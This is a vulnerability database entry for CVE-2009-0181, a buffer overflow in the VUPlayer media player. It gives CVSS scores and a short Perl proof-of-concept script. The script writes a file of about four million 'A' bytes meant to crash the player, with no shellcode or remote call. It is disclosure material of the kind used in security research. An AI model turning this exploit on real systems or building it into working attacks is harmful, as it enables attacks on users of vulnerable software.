Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
VUPLAYER BufferOver flow POC
2009.01.22
Credit:
AlpHaNiX
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2009-0181
CWE:
CWE-119
CVSS Base Score:
9.3/10
Impact Subscore:
10/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
Complete
Integrity impact:
Complete
Availability impact:
Complete
#!/usr/bin/perl system("color 3"); if (@ARGV != 1) { &help; exit(); } sub help(){ print "[X] Usage : ./exploit.pl filename \n"; } { $file = $ARGV[0]; } print "\n [X]*******************************************\n"; print " [X] VUPLAYER BufferOver flow POC *\n"; print " [X] Coded By AlpHaNiX *\n"; print " [X] From Null Area *\n"; print " [X]*******************************************\n\n"; print "[+] Exploiting.....\n" ; my $buff="\x41\x41\x41\x41" x 1000000 ; print "[+] Creating Evil File" ; open($FILE, ">>$file") or die "Cannot open $file"; print $FILE $buff; close($FILE); print "\n[+] Please wait while creating $file"; print "\n[+] $file has been created";
References:
http://www.securityfocus.com/archive/1/archive/1/499810/100/0/threaded
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top